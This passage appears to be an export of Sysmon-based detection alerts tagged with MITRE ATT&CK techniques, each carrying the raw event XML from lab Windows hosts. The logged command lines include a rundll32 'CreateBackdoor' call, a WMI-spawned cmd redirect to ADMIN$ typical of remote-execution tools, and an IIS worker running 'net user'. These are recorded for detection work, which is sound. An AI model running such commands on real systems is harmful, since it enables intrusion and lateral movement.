<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 url.dll,OpenURL ms-browser://</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-28B3-5E1E-0000-002057EB7B00</Data>
<Data Name=""LogonId"">0x7beb57</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-28B3-5E1E-0000-0010CAEC7B00</Data>
<Data Name=""ParentProcessId"">1632</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1579034803.819347,2020-01-15T00:46:43.819347+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,OpenURL ms-browser:// )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-01-14T20:46:43.237922Z"">
</TimeCreated>
<EventRecordID>340</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1840"" ThreadID=""8032"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-01-14 20:46:43.232</Data>
<Data Name=""ProcessGuid"">747F3D96-28B3-5E1E-0000-00101DF17B00</Data>
<Data Name=""ProcessId"">3412</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 url.dll,OpenURL ms-browser://</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-28B3-5E1E-0000-002057EB7B00</Data>
<Data Name=""LogonId"">0x7beb57</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-28B3-5E1E-0000-0010CAEC7B00</Data>
<Data Name=""ParentProcessId"">1632</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1597237536.555348,2020-08-12T17:05:36.555348+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\SYSTEM32\cmd.exe /c &quot;&quot;C:\Program Files\Npcap\CheckStatus.bat&quot;&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-08-12T13:05:20.029483Z"">
</TimeCreated>
<EventRecordID>342406</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3344"" ThreadID=""4176"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-08-12 13:05:14.798</Data>
<Data Name=""ProcessGuid"">747F3D96-E90A-5F33-0000-0010863C0100</Data>
<Data Name=""ProcessId"">1740</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">C:\Windows\SYSTEM32\cmd.exe /c &quot;&quot;C:\Program Files\Npcap\CheckStatus.bat&quot;&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-E909-5F33-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-E90A-5F33-0000-00102CF20000</Data>
<Data Name=""ParentProcessId"">1180</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1584766825.513362,2020-03-21T09:00:25.513362+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.499077Z"">
</TimeCreated>
<EventRecordID>243562</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:25.488</Data>
<Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-00105B9A2000</Data>
<Data Name=""ProcessId"">2028</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1579034803.819347,2020-01-15T00:46:43.819347+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,OpenURL ms-browser:// )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-01-14T20:46:43.237922Z"">
</TimeCreated>
<EventRecordID>340</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1840"" ThreadID=""8032"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-01-14 20:46:43.232</Data>
<Data Name=""ProcessGuid"">747F3D96-28B3-5E1E-0000-00101DF17B00</Data>
<Data Name=""ProcessId"">3412</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 url.dll,OpenURL ms-browser://</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-28B3-5E1E-0000-002057EB7B00</Data>
<Data Name=""LogonId"">0x7beb57</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-28B3-5E1E-0000-0010CAEC7B00</Data>
<Data Name=""ParentProcessId"">1632</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1579034803.819347,2020-01-15T00:46:43.819347+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,OpenURL ms-browser:// )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-01-14T20:46:43.237922Z"">
</TimeCreated>
<EventRecordID>340</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1840"" ThreadID=""8032"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-01-14 20:46:43.232</Data>
<Data Name=""ProcessGuid"">747F3D96-28B3-5E1E-0000-00101DF17B00</Data>
<Data Name=""ProcessId"">3412</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 url.dll,OpenURL ms-browser://</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-28B3-5E1E-0000-002057EB7B00</Data>
<Data Name=""LogonId"">0x7beb57</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-28B3-5E1E-0000-0010CAEC7B00</Data>
<Data Name=""ParentProcessId"">1632</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.513362,2020-03-21T09:00:25.513362+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.499077Z"">
</TimeCreated>
<EventRecordID>243562</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:25.488</Data>
<Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-00105B9A2000</Data>
<Data Name=""ProcessId"">2028</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Detect IIS/Exchange Exploitation,1558661633.122501,2019-05-24T05:33:53.122501+04:00,,Threat,Critical,IIS run command with user (IIS APPPOOL\DefaultAppPool) and process name (C:\Windows\System32\cmd.exe) and commandline ( &quot;c:\windows\system32\cmd.exe&quot; /c net user ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-24T01:33:53.112486Z"">
</TimeCreated>
<EventRecordID>1044</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""2092"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-24 01:33:53.112</Data>
<Data Name=""ProcessGuid"">365ABB72-4A01-5CE7-0000-0010EE9DAC00</Data>
<Data Name=""ProcessId"">2404</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;c:\windows\system32\cmd.exe&quot; /c net user</Data>
<Data Name=""CurrentDirectory"">c:\windows\system32\inetsrv\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-45C7-5CE7-0000-002092F99C00</Data>
<Data Name=""LogonId"">0x9cf992</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-49D6-5CE7-0000-001020A7A700</Data>
<Data Name=""ParentProcessId"">2580</Data>
<Data Name=""ParentImage"">C:\Windows\System32\inetsrv\w3wp.exe</Data>
<Data Name=""ParentCommandLine"">c:\windows\system32\inetsrv\w3wp.exe -ap &quot;DefaultAppPool&quot; -v &quot;v2.0&quot; -l &quot;webengine4.dll&quot; -a \\.\pipe\iisipm719e5ea8-b97b-40d0-96b6-44cca91790fe -h &quot;C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config&quot; -w &quot;&quot; -m 0 -t 20</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1584766825.513362,2020-03-21T09:00:25.513362+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.499077Z"">
</TimeCreated>
<EventRecordID>243562</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:25.488</Data>
<Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-00105B9A2000</Data>
<Data Name=""ProcessId"">2028</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1556656371.324839,2019-05-01T00:32:51.324839+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd 1&gt; \\127.0.0.1\ADMIN$\__1556656369.7 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-30T20:32:51.246714Z"">
</TimeCreated>
<EventRecordID>9827</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1964"" ThreadID=""1664"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-04-30 20:32:51.246</Data>
<Data Name=""ProcessGuid"">365ABB72-B0F3-5CC8-0000-0010B1361D00</Data>
<Data Name=""ProcessId"">2504</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd.exe /Q /c cd 1&gt; \\127.0.0.1\ADMIN$\__1556656369.7 2&gt;&amp;1</Data>
<Data Name=""CurrentDirectory"">C:\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-B0F2-5CC8-0000-00203D311D00</Data>
<Data Name=""LogonId"">0x1d313d</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-B0C0-5CC8-0000-001017C31C00</Data>
<Data Name=""ParentProcessId"">836</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558661633.122501,2019-05-24T05:33:53.122501+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;c:\windows\system32\cmd.exe&quot; /c net user ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-24T01:33:53.112486Z"">
</TimeCreated>
<EventRecordID>1044</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""2092"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-24 01:33:53.112</Data>
<Data Name=""ProcessGuid"">365ABB72-4A01-5CE7-0000-0010EE9DAC00</Data>
<Data Name=""ProcessId"">2404</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;c:\windows\system32\cmd.exe&quot; /c net user</Data>
<Data Name=""CurrentDirectory"">c:\windows\system32\inetsrv\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-45C7-5CE7-0000-002092F99C00</Data>
<Data Name=""LogonId"">0x9cf992</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-49D6-5CE7-0000-001020A7A700</Data>
<Data Name=""ParentProcessId"">2580</Data>
<Data Name=""ParentImage"">C:\Windows\System32\inetsrv\w3wp.exe</Data>
